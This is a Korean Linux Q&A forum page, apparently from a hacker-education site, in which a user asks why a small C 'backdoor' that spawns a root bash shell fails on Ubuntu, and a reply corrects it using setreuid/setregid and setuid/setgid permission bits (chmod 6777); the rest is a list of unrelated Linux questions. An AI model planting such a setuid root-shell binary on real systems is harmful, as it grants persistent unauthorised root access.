리눅스

3923,

11/197

리눅스펭귄

우분투에서 백도어가 안돌아가나요?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4219 [복사]

#include <stdio.h>

int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}

이렇게 하고 실행을 시켰는데,(물론 공격대상은 제 컴퓨터입니다. 제가 루트계정으로 해당 소스를 짜고 컴파일한 뒤, chmod 777로 바꿔줬습니다.)
쉘이 안바뀌더군요.

디버깅 하려고 printf 몇개 박아봤는데, setgid까진 잘 되다가 시스템함수를 아예 실행을 안해요. 디버거로 디스어셈블 해봐도 딱히 문제는 없는데, 디버거에서 브레이크 한 줄에 하나씩 박고 감시를 해도, system("/bin/bash"); 를 무시하고 지나가네요.

우분투 12.04LTS 인데, 보안상 막힌건가요?

Hit : 3705 Date : 2012/10/13 07:00


cd80	system함수가 ruid rgid를 가져오기때문에 setuid와 setgid로 설정한 루트 uid gid로는 루트권한의 쉘을 실행할 수 없습니다 소스를 #include <stdio.h> int main() { setreuid(0, 0); setregid(0, 0); system("/bin/bash"); } 와 같이 바꾸신후 컴파일 하신후 chmod 777이 아닌 chmod 6777 로 권한설정해주시면 원하시는대로 하실 수 있으실것 같습니다 p.s. 그리고 아마 /bin/bash는 실행된거같습니다 ps 명령어로 확인해보세요	2012/10/13
ISHack	setuid라면 4777이 아닐까요?	2012/10/14
cd80	ISHack// 작성자님이 소스에서 원하시는게 uid와 gid 모두 바꾸는거라 setuid와 setgid를 걸어줘야 하는데 setuid는 4고 setgid는 2라 둘을 더한 6이 setuid + setgid입니다	2012/10/15
ISHack	cd80// 아하. 다시읽어보니 유저와 그룹을 동시에 사용해야하는군요!	2012/10/16

3723

리눅스 명령어의 옵션 순서 상관있나요?

1qwe1qwe

11/19

2853

3722

리눅스에서 shutdown 명령[1]

1qwe1qwe

11/19

3327

3721

리눅스 명령어 ( ; ) 과 ( | ) 질문 드립니다.[2]

kmc8724

11/17

2808

3720

centos 5.3 네트워크 설치시 문제가 있습니다

marlosin

11/15

3227

3719

리눅스 하위폴더 까지 삭제할때 명령어...[3]

1qwe1qwe

11/14

7531

3718

리눅스 설치시 파티션 설정 질문입니다.

powerima

11/12

2275

3717

VMware 2개를 돌리게되면?

jin189

11/07

2806

3716

구식 노트북에 centos 6.3 설치할 예정인데요

marlosin

11/02

2371

3715

페도라 12 이거 뭐가문제에요?[1]

han7685

11/01

2178

3714

백트랙 오류

motae1122

10/22

2266

3713

backtrack5 r3 usb 부팅에러

motae1122

10/22

3189

3712

windows 7과 centos 6.3 멀티로더 사용중에 문제가 있습니다[1]

marlosin

10/21

3634

3711

VMware안에 있는 리눅스(패도라)로 ping이 보내지지않습니다.[1]

dudgns0908

10/20

4249

3710

리눅스 재설치

yj6393

10/16

2253

3709

VM ware에서 CentOS를 깔려고 하는데 오류가 계속나네요.. 도와주세요 ㅜㅜ[2]

ysp0530

10/13

5984

우분투에서 백도어가 안돌아가나요?[4]

리눅스펭귄

10/13

3704

3707

xinetd로 작동하는 프로그램 printf가 나중에 출력되는 이유가 무엇인가요?[3]

attainer

10/12

4217

3706

노트북 하나만 골라주세요~ 리눅스사용입니다.[2]

jin189

10/08

2208

3705

리눅스 메모리 덤프파일 분석 질문이요 ㅠㅠ

icorra

10/05

3459

3704

vmware player용 리눅스 백트랙 질문

qudgk1177

10/02

2515

[1].. 11 [12][13][14][15][16][17][18][19][20]..[197]